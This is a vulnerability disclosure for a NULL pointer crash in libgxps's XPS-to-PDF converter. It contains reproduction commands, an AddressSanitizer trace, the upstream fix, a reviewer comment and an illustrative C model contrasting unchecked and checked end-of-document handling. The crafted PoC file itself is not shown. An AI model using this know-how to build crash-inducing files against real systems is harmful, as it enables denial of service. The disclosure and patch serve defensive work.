|=----------------------------------------------------------------------------=|
|=-----------------------=[ Vulnerability Disclosure ]=-----------------------=|
|=--------=[ GNOME/libgxps: Mishandle NULL pointer in the converter ]=--------=|
|=----------------------------------------------------------------------------=|
|=-----------------------=[ Thu 03 Feb 2021 10:21:20 ]=-----------------------=|
|=--------=[ https://qiuhao.org/VD_GNOME_libgxps_converter_NULL.txt ]=--------=|
|=----------------------------------------------------------------------------=|

-- [ Description

During fuzzing, we found gxps_converter_print_converter_end_document() in
gxps-print-converter.c doesn't check if converter->surface == NULL, which could
lead to DoS if someone uses this routine to handle a crafted xps file.

-- [ Affected

* master branch, 19 Aug 2020, 6bf9be28
* Package: libgxps-dev, libgxps-utils, Version: 0.3.1

-- [ Reproduce

* Reproduce with the package libgxps-utils:

  $ sudo apt install libgxps-utils
  $ xpstopdf ./PoC.xps   # xpstops, xpstops, xpstosvg
  Error getting page 1: Page source /Documents/1/Pages/1.fpage not found in archive
  Segmentation fault (core dumped)

* Reproduce with an executable built with ASAN:

  $ ./libgxps/builddir_asan/tools/xpstopdf ./PoC.xps /dev/null
  Error getting page 1: Page source /Documents/1/Pages/1.fpage not found in archive
  AddressSanitizer:DEADLYSIGNAL
  =================================================================
  ==4153405==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000001c (pc 0x7ffff7ac9694 bp 0x7fffffffe730 sp 0x7fffffffe5f8 T0)
  ==4153405==The signal is caused by a READ memory access.
  ==4153405==Hint: address points to the zero page.
      #0 0x7ffff7ac9694 in cairo_surface_status (/lib/x86_64-linux-gnu/libcairo.so.2+0x77694)
      #1 0x305734 in gxps_converter_print_converter_end_document /home/ubuntu/libgxps/builddir_asan/../tools/gxps-print-converter.c:216:18
      #2 0x302333 in gxps_converter_end_document /home/ubuntu/libgxps/builddir_asan/../tools/gxps-converter.c:188:17
      #3 0x302333 in gxps_converter_run /home/ubuntu/libgxps/builddir_asan/../tools/gxps-converter.c:332:9
      #4 0x2fe031 in main /home/ubuntu/libgxps/builddir_asan/../tools/gxps-converter-main.c:40:9
      #5 0x7ffff76e70b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
      #6 0x2528ad in _start (/home/ubuntu/libgxps/builddir_asan/tools/xpstopdf+0x2528ad)

  AddressSanitizer can not provide additional info.
  SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libcairo.so.2+0x77694) in cairo_surface_status
  ==4153405==ABORTING

-- [ Patch

From 2d2e27caaa951697baf4846bfb13f85fcb8c5110 Mon Sep 17 00:00:00 2001
From: Qiuhao Li
Date: Wed, 3 Feb 2021 22:58:51 +0800
Subject: [PATCH] tools: check whether converter->surface is NULL

---
 tools/gxps-print-converter.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/tools/gxps-print-converter.c b/tools/gxps-print-converter.c
index a4f2e13..807ce8e 100644
--- a/tools/gxps-print-converter.c
+++ b/tools/gxps-print-converter.c
@@ -212,6 +212,8 @@ gxps_converter_print_converter_end_document (GXPSConverter *converter)
         GXPSPrintConverter *print_converter = GXPS_PRINT_CONVERTER (converter);
         cairo_status_t status;
 
+        if (converter->surface == NULL)
+                return;
         cairo_surface_finish (converter->surface);
         status = cairo_surface_status (converter->surface);
         if (status)
-- 
2.25.1

-- [ PoC.xps

$ base64 PoC.xps

Update, Thu, 04 Feb 2021 09:27:56 +0000: Patch Committed - https://gitlab.gnome.org/GNOME/libgxps/-/commit/d32d6026c9fb545ef608e4afd964ad0dae14bef5
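Review bot: the early return before cairo_surface_finish (converter->surface) removes the NULL dereference, but it makes end_document finish silently in exactly the case the reproduction hits, where no page loaded ("Page source ... not found in archive") and so no surface and no output file were ever created; since gxps_converter_run calls end_document unconditionally after the page loop (frames #2 and #3 in the trace), consider reporting that nothing was written on this path, the way the existing `if (status)` branch reports cairo errors, so the tool does not end as if the conversion succeeded.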
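As an added illustration (not libgxps code), the converter lifecycle behind this bug, modelled with constructed stand-ins for the cairo surface and for the zip archive: the surface only comes into existence once a page has loaded, so an end_document that dereferences it unconditionally crashes on a crafted file whose page parts are missing, while the checked variant turns that into an error the caller can act on instead of a crash or a silent success. The names surface_t, converter_t, archive_has, begin_page, run_document and the archive contents are assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the cairo surface that the real end_document hands
 * to cairo_surface_finish()/cairo_surface_status(). */
typedef struct { int finished; } surface_t;
typedef struct {
        surface_t storage;
        surface_t *surface;     /* NULL until the first page actually renders */
} converter_t;

/* Constructed archive lookup: 'archive' lists the part names the zip holds. */
int archive_has(const char *const *archive, size_t n, const char *part) {
        for (size_t i = 0; i < n; i++)
                if (strcmp(archive[i], part) == 0) return 1;
        return 0;
}

/* A missing page part is reported and skipped; the surface is created lazily
 * on the first page that loads, which a file with no page parts never reaches. */
int begin_page(converter_t *c, const char *const *archive, size_t n, const char *part) {
        if (!archive_has(archive, n, part)) {
                fprintf(stderr, "Error getting page: Page source %s not found in archive\n", part);
                return -1;
        }
        if (c->surface == NULL) { c->storage.finished = 0; c->surface = &c->storage; }
        return 0;
}

/* Unpatched shape: unconditional dereference, so zero rendered pages means SEGV. */
int end_document_unchecked(converter_t *c) {
        c->surface->finished = 1;
        return 0;
}

/* Hardened shape: "no surface" is an error the caller sees, not a crash and
 * not a silent return that looks like a successful conversion. */
int end_document_checked(converter_t *c) {
        if (c->surface == NULL) {
                fprintf(stderr, "No page could be rendered; no output written\n");
                return -1;
        }
        c->surface->finished = 1;
        return 0;
}

/* Lifecycle as in the trace: page errors are printed, end_document still runs. */
int run_document(const char *const *archive, size_t narchive, const char *const *pages,
                 size_t npages, int (*end_doc)(converter_t *)) {
        converter_t conv = { { 0 }, NULL };
        for (size_t i = 0; i < npages; i++)
                begin_page(&conv, archive, narchive, pages[i]);
        return end_doc(&conv) == 0 ? 0 : 1;   /* process exit status */
}
```

Running run_document with end_document_unchecked on the archive that lacks the page part reproduces the crash shape; with end_document_checked the same input yields exit status 1 and a message instead.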